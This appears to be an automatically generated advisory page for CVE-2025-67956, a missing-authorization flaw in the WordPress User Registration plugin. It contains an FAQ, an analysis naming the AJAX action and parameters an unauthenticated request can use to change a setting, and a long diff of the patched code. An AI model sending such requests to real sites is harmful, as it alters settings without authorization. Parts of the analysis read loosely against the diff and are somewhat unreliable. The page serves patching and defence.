What is CVE-2025-67956?

CVE-2025-67956 is a medium severity vulnerability in the User Registration plugin for WordPress, affecting versions up to and including 4.4.6. It is caused by a missing authorization check in the AJAX request handling, allowing unauthenticated users to perform unauthorized actions.

How does this vulnerability work?

The vulnerability allows attackers to send a specially crafted POST request to the plugin’s AJAX endpoint without authentication. By specifying the `action` parameter as `user_registration_ajax_save_settings`, they can modify plugin settings, such as the reset password page ID, without proper authorization.

Who is affected by this vulnerability?

Any WordPress site using the User Registration plugin version 4.4.6 or earlier is affected. Administrators should check their plugin version in the WordPress dashboard under the Plugins section to determine if they are vulnerable.

How can I check if my site is vulnerable?

To check if your site is vulnerable, navigate to the Plugins section in your WordPress admin dashboard. Look for the User Registration plugin and verify that the version is 4.4.6 or earlier. If it is, your site is at risk.

How can I fix this vulnerability?

To mitigate this vulnerability, update the User Registration plugin to version 4.4.7 or later, where the issue has been patched. Regularly check for updates to all plugins to ensure ongoing security.

What does the CVSS score of 5.3 mean?

A CVSS score of 5.3 indicates a medium severity vulnerability. This means that while the risk is not critical, it is significant enough that administrators should address it promptly to prevent potential exploitation.

What are the practical risks of this vulnerability?

The practical risks include unauthorized changes to plugin settings, such as the reset password page, which could disrupt user functionality. While the immediate impact may seem limited, it could lead to further exploitation if combined with other vulnerabilities.

What is the proof of concept for this vulnerability?

The proof of concept demonstrates how an attacker can exploit the vulnerability by sending a crafted POST request to the AJAX endpoint. It shows how to specify the required parameters to bypass authentication and modify settings, illustrating the ease of exploitation.

What should I do if I cannot update the plugin immediately?

If immediate updates are not possible, consider disabling the User Registration plugin until a patch can be applied. Additionally, review user permissions and limit access to the WordPress admin area to trusted users only.

Are there any other vulnerabilities associated with this plugin?

While CVE-2025-67956 is a specific vulnerability, it highlights a broader pattern of missing authorization checks. It is advisable to conduct a security audit of your plugins and ensure that all are regularly updated and reviewed for security best practices.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2025-67956: User Registration <= 4.4.6 – Missing Authorization (user-registration)

CVE ID CVE-2025-67956

Plugin user-registration

Severity Medium (CVSS 5.3)

CWE 862

Vulnerable Version 4.4.6

Patched Version 4.4.7

Disclosed January 20, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-67956:
The User Registration plugin for WordPress versions up to and including 4.4.6 contains a missing authorization vulnerability in its AJAX request handling. This allows unauthenticated attackers to execute privileged administrative actions via the plugin’s AJAX endpoint.

Atomic Edge research identifies the root cause in the `class-ur-ajax.php` file. The `user_registration_reset_password_page_id` AJAX action handler, located at lines 2412-2440 in the vulnerable version, lacks any capability check before processing requests. The function `ur_find_reset_password_in_page()` validates page content but does not verify if the requesting user has administrative privileges. This missing authorization check occurs within the `user_registration_ajax_save_settings()` function which processes multiple AJAX actions without proper permission validation.

The exploitation method involves sending a POST request to `/wp-admin/admin-ajax.php` with the `action` parameter set to `user_registration_ajax_save_settings`. Attackers must include the `setting_name` parameter with value `user_registration_reset_password_page_id` and a `setting_value` parameter containing a valid WordPress page ID. The request bypasses WordPress nonce verification and user authentication checks. Unauthenticated users can trigger this AJAX handler to modify plugin settings.

The patch removes the vulnerable `user_registration_reset_password_page_id` case entirely from the AJAX handler. Lines 2412-2440 in `class-ur-ajax.php` are deleted, eliminating the unauthorized endpoint. The plugin also updates `functions-ur-core.php` to remove the `user_registration_reset_password_page_id` from default page settings at line 3386. These changes prevent unauthenticated access by removing the vulnerable code path rather than adding authorization checks.

Successful exploitation allows attackers to modify the plugin’s reset password page setting. While this specific action has limited direct impact, the vulnerability demonstrates a broader missing authorization pattern. Attackers could potentially chain this with other vulnerabilities or use it to disrupt user password reset functionality. The CVSS 5.3 score reflects medium severity due to the need for a valid page ID and limited direct privilege escalation.

Differential between vulnerable and patched code

Code Diff

--- a/user-registration/includes/RestApi/controllers/version1/class-ur-getting-started.php
+++ b/user-registration/includes/RestApi/controllers/version1/class-ur-getting-started.php
@@ -223,14 +223,17 @@

 		$post_content          = '';
 		$membership_field_name = 'membership_field_' . ur_get_random_number();
+		$registration_type = 'membership';
+
 		if ( 'user_registration_normal_registration' === $request['registrationType'] ) {
+			$registration_type = 'normal';
 			if ( 0 === count( $hasposts ) ) {
 				$post_content = '[[[{"field_key":"user_login","general_setting":{"label":"Username","description":"","field_name":"user_login","placeholder":"","required":"1","hide_label":"false"},"advance_setting":{"custom_class":"","username_length":"","username_character":"1"},"icon":"ur-icon ur-icon-user"}],[{"field_key":"user_email","general_setting":{"label":"User Email","description":"","field_name":"user_email","placeholder":"","required":"1","hide_label":"false"},"advance_setting":{"custom_class":""},"icon":"ur-icon ur-icon-email"}]],[[{"field_key":"user_pass","general_setting":{"label":"User Password","description":"","field_name":"user_pass","placeholder":"","required":"1","hide_label":"false"},"advance_setting":{"custom_class":""},"icon":"ur-icon ur-icon-password"}],[{"field_key":"user_confirm_password","general_setting":{"label":"Confirm Password","description":"","field_name":"user_confirm_password","placeholder":"","required":"1","hide_label":"false"},"advance_setting":{"custom_class":""},"icon":"ur-icon ur-icon-password-confirm"}]]]';
 			}
 		} elseif ( 0 === count( $hasposts ) ) {
 			$post_content = '[[[{"field_key":"user_login","general_setting":{"label":"Username","description":"","field_name":"user_login","placeholder":"","required":"1","hide_label":"false"},"advance_setting":{"custom_class":"","username_length":"","username_character":"1"},"icon":"ur-icon ur-icon-user"}],[{"field_key":"user_email","general_setting":{"label":"User Email","description":"","field_name":"user_email","placeholder":"","required":"1","hide_label":"false"},"advance_setting":{"custom_class":""},"icon":"ur-icon ur-icon-email"}]],[[{"field_key":"user_pass","general_setting":{"label":"User Password","description":"","field_name":"user_pass","placeholder":"","required":"1","hide_label":"false"},"advance_setting":{"custom_class":""},"icon":"ur-icon ur-icon-password"}],[{"field_key":"user_confirm_password","general_setting":{"label":"Confirm Password","description":"","field_name":"user_confirm_password","placeholder":"","required":"1","hide_label":"false"},"advance_setting":{"custom_class":""},"icon":"ur-icon ur-icon-password-confirm"}]],[[{"field_key":"membership","general_setting":{"label":"Membership Field","description":"","field_name":"' . $membership_field_name . '","placeholder":"","required":"false","hide_label":"false","membership_listing_option":"all"},"advance_setting":{"custom_class":""},"icon":"ur-icon ur-icon-membership-field"}]]]';
 		}
-
+		update_option('urm_initial_registration_type', $registration_type );
 		$default_form = get_option( 'user_registration_default_form_page_id', 0 );

 		if ( 0 === count( $hasposts ) ) {
--- a/user-registration/includes/class-ur-ajax.php
+++ b/user-registration/includes/class-ur-ajax.php
@@ -2412,29 +2412,6 @@
 					);
 				}
 				break;
-			case 'user_registration_reset_password_page_id':
-				if ( empty( $page_id ) ) {
-					wp_send_json_error(
-						array(
-							'message' => esc_html__(
-								'Please select a valid reset password page that contains the reset password shortcode [user_registration_reset_password_form]',
-								'user-registration'
-							),
-						)
-					);
-				}
-				$is_page_reset_password_page = ur_find_reset_password_in_page( $page_id );
-				if ( ! $is_page_reset_password_page ) {
-					wp_send_json_error(
-						array(
-							'message' => esc_html__(
-								'The selected page does not contain the required password reset shortcode [user_registration_reset_password_form]',
-								'user-registration'
-							),
-						)
-					);
-				}
-				break;
 			case 'user_registration_login_options_login_redirect_url':
 				if ( empty( $page_id ) ) {
 					wp_send_json_error(
--- a/user-registration/includes/class-ur-smart-tags.php
+++ b/user-registration/includes/class-ur-smart-tags.php
@@ -248,7 +248,7 @@
 						break;

 					case 'user_roles':
-						if ( ! empty( $values['user_id'] ) || ! empty( $values[ 'member_id' ] ) || is_user_logged_in() ) {
+						if ( ! empty( $values['user_id'] ) || ! empty( $values['member_id'] ) || is_user_logged_in() ) {
 							$user_id    = $values['user_id'] ?? $values['member_id'] ?? get_current_user_id();
 							$user_roles = ur_get_user_roles( $user_id )[0];
 						} else {
@@ -298,8 +298,8 @@
 						break;

 					case 'all_fields':
-						if ( ! empty( $values[ 'user_id' ] ) || ! empty( $values[ 'member_id' ] )  ) {
-							$user_id = $values[ 'user_id' ] ?? $values[ 'member_id' ];
+						if ( ! empty( $values['user_id'] ) || ! empty( $values['member_id'] ) ) {
+							$user_id = $values['user_id'] ?? $values['member_id'];
 						} else {
 							$user_id = (int) get_current_user_id();
 						}
@@ -381,9 +381,9 @@
 						break;

 					case 'form_id':
-						if( ! empty( $values[ 'form_id'] ) ) {
+						if ( ! empty( $values['form_id'] ) ) {
 							$form_id = $values['form_id'];
-						} elseif( !empty( $values['user_id'] ) || !empty( $values['member_id'] ) || is_user_logged_in() ) {
+						} elseif ( ! empty( $values['user_id'] ) || ! empty( $values['member_id'] ) || is_user_logged_in() ) {
 							$user_id = $values['user_id'] ?? $values['member_id'] ?? get_current_user_id();
 							$form_id = ur_get_form_id_by_userid( $user_id );
 						} else {
@@ -394,14 +394,14 @@
 					case 'form_name':
 						if ( isset( $values['form_id'] ) ) {
 							$form_name = ucfirst( get_the_title( $values['form_id'] ) );
-						} elseif( !empty( 'user_id' ) || !empty( 'member_id' ) || is_user_logged_in() ) {
-							$user_id = $values['user_id'] ?? $values['member_id'] ?? get_current_user_id();
-							$form_id = ur_get_form_id_by_userid( $user_id );
+						} elseif ( ! empty( 'user_id' ) || ! empty( 'member_id' ) || is_user_logged_in() ) {
+							$user_id   = $values['user_id'] ?? $values['member_id'] ?? get_current_user_id();
+							$form_id   = ur_get_form_id_by_userid( $user_id );
 							$form_name = ucfirst( get_the_title( $form_id ) );
 						} else {
 							$form_name = '';
 						}
-						$content   = str_replace( '{{' . $other_tag . '}}', $form_name, $content );
+						$content = str_replace( '{{' . $other_tag . '}}', $form_name, $content );
 						break;

 					case 'user_ip_address':
@@ -525,10 +525,10 @@
 						}
 						break;
 					case 'display_name':
-						$user_id   = ! empty( $values['user_id'] ) ? $values['user_id'] : get_current_user_id();
-						$user_data = get_userdata( $user_id );
+						$user_id      = ! empty( $values['user_id'] ) ? $values['user_id'] : get_current_user_id();
+						$user_data    = get_userdata( $user_id );
 						$display_name = isset( $user_data->display_name ) ? $user_data->display_name : '';
-						$content   = str_replace( '{{' . $tag . '}}', esc_html( $display_name ), $content );
+						$content      = str_replace( '{{' . $tag . '}}', esc_html( $display_name ), $content );
 						break;

 					case 'profile_pic_box':
@@ -549,7 +549,7 @@
 						$last_name  = ucfirst( get_user_meta( get_current_user_id(), 'last_name', true ) );
 						$full_name  = $first_name . ' ' . $last_name;
 						if ( empty( $first_name ) && empty( $last_name ) ) {
-							$userdata = get_userdata( get_current_user_id() );
+							$userdata  = get_userdata( get_current_user_id() );
 							$full_name = isset( $userdata->display_name ) ? $userdata->display_name : '';
 						}
 						$content = str_replace( '{{' . $tag . '}}', esc_html( $full_name ), $content );
@@ -575,14 +575,20 @@
 						break;
 					case 'ur_reset_pass_slug':
 						$reset_password_page = get_option( 'user_registration_reset_password_page_id', false );
-						$lost_password_page = get_option( 'user_registration_lost_password_page_id', false );
-						$reset_pass_slug    = '';
-						if( $reset_password_page ) {
+						$lost_password_page  = get_option( 'user_registration_lost_password_page_id', false );
+						$reset_pass_slug     = '';
+
+						$reset_password_page_exists = false;
+
+						if ( $reset_password_page ) {
+							$reset_password_page_exists = get_post( $reset_password_page ) ? true : false;
+						}
+
+						if ( $reset_password_page_exists ) {
 							$reset_password_url = get_permalink( $reset_password_page );
 							$ur_reset_pass      = ( get_home_url() !== $reset_password_url ) ? $reset_password_url : wp_lostpassword_url();
-							$reset_pass_slug   = str_replace( get_home_url() . '/', '', $ur_reset_pass );
-						}
-						else if ( $lost_password_page ) {
+							$reset_pass_slug    = str_replace( get_home_url() . '/', '', $ur_reset_pass );
+						} elseif ( $lost_password_page ) {
 							$lost_password_url = get_permalink( $lost_password_page );
 							$ur_lost_pass      = ( get_home_url() !== $lost_password_url ) ? $lost_password_url : wp_login_url();
 							$reset_pass_slug   = str_replace( get_home_url() . '/', '', $ur_lost_pass );
@@ -627,7 +633,7 @@
 					case 'membership_renewal_link':
 						if ( isset( $values[ $other_tag ] ) ) {
 							$value = $values[ $other_tag ];
-						} elseif ( isset( $values[ 'membership_tags' ][ $other_tag ] ) ) {
+						} elseif ( isset( $values['membership_tags'][ $other_tag ] ) ) {
 							$value = $values['membership_tags'][ $other_tag ];
 						} else {
 							$value = '';
@@ -639,9 +645,9 @@
 						if ( ! empty( $values['membership_tags'] ) ) {
 							$membership_tags                  = $values['membership_tags'];
 							$membership_plan_types            = array(
-								'One-Time Payment'         => __( 'One-Time Payment', 'user-registration' ),
-								'Free'                     => __( 'Free', 'user-registration' ),
-								'Subscription'             => __( 'Subscription', 'user-registration' ),
+								'One-Time Payment' => __( 'One-Time Payment', 'user-registration' ),
+								'Free'             => __( 'Free', 'user-registration' ),
+								'Subscription'     => __( 'Subscription', 'user-registration' ),
 							);
 							$membership_plan_payment_statuses = array(
 								'Completed' => __( 'Completed', 'user-registration' ),
--- a/user-registration/includes/functions-ur-core.php
+++ b/user-registration/includes/functions-ur-core.php
@@ -1147,6 +1147,7 @@
 				'custom_attributes' => array(),
 				'default'           => ur_get_single_post_meta( $form_id, 'user_registration_form_template', ucwords( str_replace( '_', ' ', get_option( 'user_registration_form_template', 'default' ) ) ) ),
 				'tip'               => __( 'Choose how your registration form looks.', 'user-registration' ),
+				'product'           => 'user-registration/user-registration.php',
 			),
 			array(
 				'type'              => 'toggle',
@@ -1253,7 +1254,8 @@
 				'type'              => 'section',
 				'title'             => __( 'Advanced', 'user-registration' ),
 				'id'                => 'user_registration_form_setting_general_advanced',
-				'class'				=> array( 'ur-form-settings-section')
+				'class'				=> array( 'ur-form-settings-section'),
+				'product'           => 'user-registration/user-registration.php',
 			),
 			array(
 				'type'              => 'toggle',
@@ -1390,6 +1392,8 @@
 				'custom_attributes' => array(),
 				'default'           => ur_get_single_post_meta( $form_id, 'user_registration_form_setting_form_submit_label', 'Submit' ),
 				'tip'               => __( 'The label shown on the form’s submit button.', 'user-registration' ),
+				'product'           => 'user-registration/user-registration.php',
+
 			),
 			array(
 				'type'              => 'text',
@@ -3382,13 +3386,7 @@
 			'user_registration_lost_password_page_id' => array(
 				'name' => 'lost-password',
 				'title' => __( 'Lost Password', 'user-registration' ),
-				'content' => '[user_registration_reset_password_form]',
-				'requires_membership' => false,
-			),
-			'user_registration_reset_password_page_id' => array(
-				'name' => 'reset-password',
-				'title' => __( 'Reset Password', 'user-registration' ),
-				'content' => '[user_registration_reset_password_form]',
+				'content' => '[user_registration_lost_password]',
 				'requires_membership' => false,
 			),
 			'user_registration_member_registration_page_id' => array(
--- a/user-registration/includes/stats/class-ur-stats-helpers.php
+++ b/user-registration/includes/stats/class-ur-stats-helpers.php
@@ -0,0 +1,213 @@
+<?php
+/**
+ * UR_Stats_Helpers Class for reusable stats calculation functions.
+ *
+ * @package User_Registration
+ */
+
+if ( ! defined( 'ABSPATH' ) ) {
+	exit;
+}
+
+if ( ! class_exists( 'UR_Stats_Helpers' ) ) {
+
+	/**
+	 * UR_Stats_Helpers class.
+	 */
+	class UR_Stats_Helpers {
+
+		/**
+		 * Get content restriction statistics.
+		 *
+		 * @return array Statistics array with total_rules, logic_gates_and_count, logic_gates_or_count, and logic_gates_not_count.
+		 */
+		public static function get_content_restriction_stats() {
+			$rules_query = new WP_Query(
+				array(
+					'post_type'      => 'urcr_access_rule',
+					'post_status'    => 'publish',
+					'posts_per_page' => -1,
+				)
+			);
+
+			$total_rules      = 0;
+			$and_gates_count  = 0;
+			$or_gates_count   = 0;
+			$not_gates_count  = 0;
+
+			foreach ( $rules_query->posts as $rule_post ) {
+				$access_rule = json_decode( $rule_post->post_content, true );
+
+				if ( ! empty( $access_rule['enabled'] ) && $access_rule['enabled'] === true ) {
+					$total_rules++;
+
+					if ( ! empty( $access_rule['logic_map'] ) && is_array( $access_rule['logic_map'] ) ) {
+						$stats = self::analyze_logic_map( $access_rule['logic_map'] );
+						$and_gates_count += $stats['and_count'];
+						$or_gates_count  += $stats['or_count'];
+						$not_gates_count += $stats['not_count'];
+					}
+				}
+			}
+
+			return array(
+				'total_rules'            => $total_rules,
+				'logic_gates_and_count'  => $and_gates_count,
+				'logic_gates_or_count'   => $or_gates_count,
+				'logic_gates_not_count'  => $not_gates_count,
+			);
+		}
+
+		/**
+		 * Check if a plugin slug or path is the content-restriction plugin/module.
+		 *
+		 * @param string $plugin_slug_or_path Plugin slug (e.g., 'user-registration-content-restriction') or full path (e.g., 'user-registration-content-restriction/user-registration-content-restriction.php').
+		 * @return bool True if it's the content-restriction plugin/module.
+		 */
+		public static function is_content_restriction_plugin( $plugin_slug_or_path ) {
+			// Extract slug from full path if needed
+			$slug = self::extract_plugin_slug( $plugin_slug_or_path );
+
+			return 'user-registration-content-restriction' === $slug;
+		}
+
+		/**
+		 * Check if a plugin slug or path is the email-templates plugin.
+		 *
+		 * @param string $plugin_slug_or_path Plugin slug (e.g., 'user-registration-email-templates') or full path (e.g., 'user-registration-email-templates/user-registration-email-templates.php').
+		 * @return bool True if it's the email-templates plugin.
+		 */
+		public static function is_email_template_plugin( $plugin_slug_or_path ) {
+			// Extract slug from full path if needed
+			$slug = self::extract_plugin_slug( $plugin_slug_or_path );
+
+			return 'user-registration-email-templates' === $slug;
+		}
+
+		/**
+		 * Extract plugin slug from plugin path.
+		 *
+		 * @param string $plugin_path
+		 * @return string Plugin slug.
+		 */
+		public static function extract_plugin_slug( $plugin_path ) {
+			if ( false !== strpos( $plugin_path, '/' ) ) {
+				$plugin_array = explode( '/', $plugin_path );
+				return isset( $plugin_array[0] ) ? $plugin_array[0] : $plugin_path;
+			}
+			return $plugin_path;
+		}
+
+		/**
+		 * Add content restriction stats to addon info array if applicable.
+		 *
+		 * @param array  $addon_info Addon info array to merge stats into.
+		 * @param string $plugin_slug_or_path Plugin slug or path to check.
+		 * @return array
+		 */
+		public static function maybe_add_content_restriction_stats( $addon_info, $plugin_slug_or_path ) {
+			if ( self::is_content_restriction_plugin( $plugin_slug_or_path ) ) {
+				$content_restriction_stats = self::get_content_restriction_stats();
+				$addon_info = array_merge( $addon_info, $content_restriction_stats );
+			}
+			return $addon_info;
+		}
+
+		/**
+		 * Add email template stats to addon info array if applicable.
+		 *
+		 * @param array  $addon_info Addon info array to merge stats into.
+		 * @param string $plugin_slug_or_path Plugin slug or path to check.
+		 * @return array
+		 */
+		public static function maybe_add_email_template_stats( $addon_info, $plugin_slug_or_path ) {
+			if ( self::is_email_template_plugin( $plugin_slug_or_path ) ) {
+				$email_template_count = self::get_email_template_stats();
+				$addon_info['total_email_template_count'] = $email_template_count;
+			}
+			return $addon_info;
+		}
+
+		/**
+		 * Get popup statistics.
+		 *
+		 * @return int Total count of active popup posts.
+		 */
+		public static function get_popup_stats() {
+			$popup_query = new WP_Query(
+				array(
+					'post_type'      => 'ur_pro_popup',
+					'post_status'    => 'publish',
+					'posts_per_page' => -1,
+					'fields'         => 'ids',
+				)
+			);
+
+			return $popup_query->found_posts;
+		}
+
+		/**
+		 * Get email template statistics.
+		 *
+		 * @return int Total count of active email template posts.
+		 */
+		public static function get_email_template_stats() {
+			if ( ! function_exists( 'is_plugin_active' ) ) {
+				include_once ABSPATH . 'wp-admin/includes/plugin.php';
+			}
+
+			$email_template_query = new WP_Query(
+				array(
+					'post_type'      => 'ur_email_templates',
+					'post_status'    => 'publish',
+					'posts_per_page' => -1,
+					'fields'         => 'ids',
+				)
+			);
+
+			return $email_template_query->found_posts;
+		}
+
+		/**
+		 * Analyze logic map structure to count gates.
+		 *
+		 * @param array $logic_map Logic map structure.
+		 * @return array Statistics array with and_count, or_count, and not_count.
+		 */
+		private static function analyze_logic_map( $logic_map ) {
+			$stats = array(
+				'and_count' => 0,
+				'or_count'  => 0,
+				'not_count' => 0,
+			);
+
+			if ( ! is_array( $logic_map ) || empty( $logic_map['type'] ) ) {
+				return $stats;
+			}
+
+			if ( isset( $logic_map['type'] ) && $logic_map['type'] === 'group' && ! empty( $logic_map['logic_gate'] ) ) {
+				$gate = strtoupper( $logic_map['logic_gate'] );
+				if ( $gate === 'AND' ) {
+					$stats['and_count'] = 1;
+				} elseif ( $gate === 'OR' ) {
+					$stats['or_count'] = 1;
+				} elseif ( $gate === 'NOT' ) {
+					$stats['not_count'] = 1;
+				}
+
+				// Recurse into conditions
+				if ( ! empty( $logic_map['conditions'] ) && is_array( $logic_map['conditions'] ) ) {
+					foreach ( $logic_map['conditions'] as $condition ) {
+						$child_stats = self::analyze_logic_map( $condition );
+						$stats['and_count'] += $child_stats['and_count'];
+						$stats['or_count']  += $child_stats['or_count'];
+						$stats['not_count'] += $child_stats['not_count'];
+					}
+				}
+			}
+
+			return $stats;
+		}
+	}
+}
+
--- a/user-registration/includes/stats/class-ur-stats.php
+++ b/user-registration/includes/stats/class-ur-stats.php
@@ -8,21 +8,23 @@
  * @since  1.0.0
  */

-if ( ! defined( 'ABSPATH' ) ) {
+if (!defined('ABSPATH')) {
 	exit;
 }
+require_once dirname(__FILE__) . '/class-ur-stats-helpers.php';

-if ( ! class_exists( 'UR_Stats' ) ) {
+if (!class_exists('UR_Stats')) {

 	/**
 	 * UR_Stats class.
 	 */
-	class UR_Stats {
+	class UR_Stats
+	{

 		/**
 		 * Remote URl Constant.
 		 */
-		const REMOTE_URL = 'https://api.themegrill.com/tracking/log';
+		const REMOTE_URL = 'https://api.themegrill.com/';

 		const LAST_RUN_STAMP = 'user_registration_send_usage_last_run';

@@ -30,39 +32,42 @@
 		/**
 		 * Constructor of the class.
 		 */
-		public function __construct() {
-			if ( ! function_exists( 'is_plugin_active' ) ) {
+		public function __construct()
+		{
+			if (!function_exists('is_plugin_active')) {
 				include_once ABSPATH . 'wp-admin/includes/plugin.php';
 			}
-			add_action( 'init', array( $this, 'init_usage' ), 4 );
-			add_action( 'update_option_user_registration_allow_usage_tracking', array( $this, 'run_on_save' ), 10, 3 );
+			add_action('init', array($this, 'init_usage'), 4);
+			add_action('update_option_user_registration_allow_usage_tracking', array($this, 'run_on_save'), 10, 3);

 			/**
 			 * Enable module tracking.
 			 *
 			 * @since 4.0
 			 */
-			add_action( 'user_registration_feature_track_data_for_tg_user_tracking', array(
+			add_action('user_registration_feature_track_data_for_tg_user_tracking', array(
 				$this,
 				'on_module_activate'
-			) ); // Hook on module activation ( Our UR module activation ).
+			)); // Hook on module activation ( Our UR module activation ).
 		}

 		/**
 		 * Get product license key.
 		 */
-		public function get_base_product_license() {
-			return get_option( 'user-registration_license_key' );
+		public function get_base_product_license()
+		{
+			return get_option('user-registration_license_key');
 		}

 		/**
 		 * Get Pro addon file.
 		 */
-		public function get_base_product() {
-			if ( $this->is_premium() ) {
-				return 'user-registration-pro/user-registration.php';
+		public function get_base_product()
+		{
+			if ($this->is_premium()) {
+				return 'user-registration-pro';
 			} else {
-				return 'user-registration/user-registration.php';
+				return 'user-registration';
 			}
 		}

@@ -71,18 +76,20 @@
 		 *
 		 * @return boolean
 		 */
-		public function is_premium() {
-			if ( is_plugin_active( 'user-registration-pro/user-registration.php' ) ) {
+		public function is_premium()
+		{
+			if (is_plugin_active('user-registration-pro/user-registration.php')) {
 				return true;
 			} else {
 				return false;
 			}
 		}

-		public function get_form_wise_user() {
+		public function get_form_wise_user()
+		{
 			return array(
-				'membership_form_users' => $this->get_form_users_count( true ),
-				'normal_form_users'     => $this->get_form_users_count(),
+				'membership_form_users' => $this->get_form_users_count(true),
+				'normal_form_users' => $this->get_form_users_count(),
 			);
 		}

@@ -91,10 +98,11 @@
 		 *
 		 * @return string|null
 		 */
-		public function get_form_users_count( $for_membership = false ) {
+		public function get_form_users_count($for_membership = false)
+		{
 			global $wpdb;
-			if ( $for_membership ) {
-				return $wpdb->get_results( $wpdb->prepare(
+			if ($for_membership) {
+				return $wpdb->get_results($wpdb->prepare(
 					"SELECT wum.meta_value AS ur_form_id,
 			                COUNT(DISTINCT wu.ID) AS total
 							FROM wp_users wu
@@ -108,10 +116,10 @@
 							GROUP BY wum.meta_value
 							ORDER BY total DESC;",
 					'ur_form_id', 'ur_registration_source', 'membership'
-				), ARRAY_A );
+				), ARRAY_A);
 			}

-			return $wpdb->get_results( $wpdb->prepare(
+			return $wpdb->get_results($wpdb->prepare(
 				"SELECT wum.meta_value AS ur_form_id,
 				       COUNT(DISTINCT wu.ID) AS total
 						FROM wp_users wu
@@ -126,7 +134,7 @@
 						GROUP BY wum.meta_value
 						ORDER BY total DESC;",
 				'ur_form_id', 'ur_registration_source', 'membership'
-			), ARRAY_A );
+			), ARRAY_A);
 		}

 		/**
@@ -134,7 +142,8 @@
 		 *
 		 * @return int
 		 */
-		public function get_user_count() {
+		public function get_user_count()
+		{
 			global $wpdb;

 			return $wpdb->get_var(
@@ -153,7 +162,8 @@
 		 *
 		 * @return int
 		 */
-		public function get_form_count() {
+		public function get_form_count()
+		{
 			global $wpdb;

 			return $wpdb->get_var(
@@ -170,51 +180,49 @@
 		 *
 		 * @return array
 		 */
-		public function get_plugin_lists() {
-
+		public function get_plugin_lists()
+		{
 			$is_premium = $this->is_premium();
-
 			$base_product = $this->get_base_product();
-
-			$active_plugins = get_option( 'active_plugins', array() );
-
 			$base_product_name = $is_premium ? 'User Registration Pro' : 'User Registration';
-
-			$product_meta = array();
-
-			$product_meta['total_form_count'] = $this->get_form_count();
-
-			$product_meta['total_user_count']     = $this->get_user_count();
-			$product_meta['form_wise_user_count'] = $this->get_form_wise_user();
-
 			$license_key = $this->get_base_product_license();
-
-			if ( $is_premium ) {
-				$product_meta['license_key'] = $license_key;
-			}
+			$form_wise_users = $this->get_form_wise_user();
+			$active_plugins = get_option('active_plugins', array());

 			$addons_data = array(
-				$base_product => array(
-					'product_name'    => $base_product_name,
+				array(
+					'product_name' => $base_product_name,
 					'product_version' => UR()->version,
-					'product_meta'    => $product_meta,
-					'product_type'    => 'plugin',
-					'product_slug'    => $base_product,
-					'is_premium'      => $is_premium,
+					'product_type' => 'plugin',
+					'product_slug' => $base_product,
+					'is_premium' => $is_premium,
+					'license_key' => $is_premium ? $license_key : '',
+					'total_form_count' => $this->get_form_count(),
+					'total_user_count' => $this->get_user_count(),
+					'membership_form_users' => $form_wise_users['membership_form_users'],
+					'normal_form_users' => $form_wise_users['normal_form_users'],
 				),
 			);

-			foreach ( $active_plugins as $plugin ) {
+			foreach ($active_plugins as $plugin) {

-				$addon_file      = WP_PLUGIN_DIR . DIRECTORY_SEPARATOR . $plugin;
-				$addon_file_data = get_plugin_data( $addon_file );
-				if ( $base_product !== $plugin ) {
-					$addons_data[ $plugin ] = array(
-						'product_name'    => isset( $addon_file_data['Name'] ) ? trim( $addon_file_data['Name'] ) : '',
-						'product_version' => isset( $addon_file_data['Version'] ) ? trim( $addon_file_data['Version'] ) : '',
-						'product_type'    => 'plugin',
-						'product_slug'    => $plugin,
+				$addon_file = WP_PLUGIN_DIR . DIRECTORY_SEPARATOR . $plugin;
+				$addon_file_data = get_plugin_data($addon_file);
+				$plugin_slug = class_exists('UR_Stats_Helpers') ? UR_Stats_Helpers::extract_plugin_slug($plugin) : (false !== strpos($plugin, '/') ? explode('/', $plugin)[0] : $plugin);
+
+				if ($base_product !== $plugin && strpos($plugin_slug, 'user-registration-') === 0) {
+					$addon_info = array(
+						'product_name' => isset($addon_file_data['Name']) ? trim($addon_file_data['Name']) : '',
+						'product_version' => isset($addon_file_data['Version']) ? trim($addon_file_data['Version']) : '',
+						'product_type' => 'plugin',
+						'product_slug' => $plugin,
 					);
+
+					if (class_exists('UR_Stats_Helpers')) {
+						$addon_info = UR_Stats_Helpers::maybe_add_email_template_stats($addon_info, $plugin);
+					}
+
+					$addons_data[] = $addon_info;
 				}
 			}

@@ -224,7 +232,7 @@
 			 *
 			 * @since 4.0
 			 */
-			$enabled_features = get_option( 'user_registration_enabled_features', array() );
+			$enabled_features = array_unique(get_option('user_registration_enabled_features', array()));

 			$addons_list_moved_into_module = array(
 				'user-registration-payments',
@@ -233,20 +241,29 @@
 				'user-registration-membership',
 			);

-			if ( ! empty( $enabled_features ) ) {
-				$our_modules     = $this->get_modules();
-				$modules_by_slug = array_column( $our_modules, null, 'slug' );
-				foreach ( $enabled_features as $slug ) {
-					if ( isset( $modules_by_slug[ $slug ] ) ) {
-						$module                       = $modules_by_slug[ $slug ];
-						$product_slug                 = in_array( $slug, $addons_list_moved_into_module ) ? $slug . '/' . $slug . '.php' : $slug;
-						$addons_data[ $product_slug ] = array(
-							'product_name'    => $module['name'],
+			if (!empty($enabled_features)) {
+				$our_modules = $this->get_modules();
+				$modules_by_slug = array_column($our_modules, null, 'slug');
+
+				foreach ($enabled_features as $slug) {
+					if (isset($modules_by_slug[$slug])) {
+						$module = $modules_by_slug[$slug];
+						$product_slug = in_array($slug, $addons_list_moved_into_module) ? $slug . '/' . $slug . '.php' : $slug;
+						$addon_info = array(
+							'product_name' => $module['name'],
 							'product_version' => UR()->version,
-							'product_type'    => in_array( $slug, $addons_list_moved_into_module ) ? 'plugin' : 'module',
-							'product_slug'    => $product_slug,
-							'is_premium'      => $is_premium
+							'product_type' => in_array($slug, $addons_list_moved_into_module) ? 'plugin' : 'module',
+							'product_slug' => $product_slug,
+							'is_premium' => $is_premium
 						);
+
+						// Add content restriction stats if it's the content-restriction module
+						if (class_exists('UR_Stats_Helpers') && $is_premium) {
+							$addon_info = UR_Stats_Helpers::maybe_add_content_restriction_stats($addon_info, $slug);
+							$addon_info = UR_Stats_Helpers::maybe_add_email_template_stats($addon_info, $slug);
+						}
+
+						$addons_data[] = $addon_info;
 					}
 				}
 			}
@@ -260,33 +277,31 @@
 		 *
 		 * @return array
 		 */
-		public function get_global_settings() {
+		public function get_global_settings()
+		{
 			$global_settings = array();
-			$settings        = $this->setting_keys();
-			$send_all        = false;
-			$send_default    = false;
-
-			foreach ( $settings as $product => $product_settings ) {
-				foreach ( $product_settings as $setting_array ) {
-					$setting_key     = $setting_array[0];
+			$settings = $this->setting_keys();
+			$send_all = false;
+			$send_default = false;
+
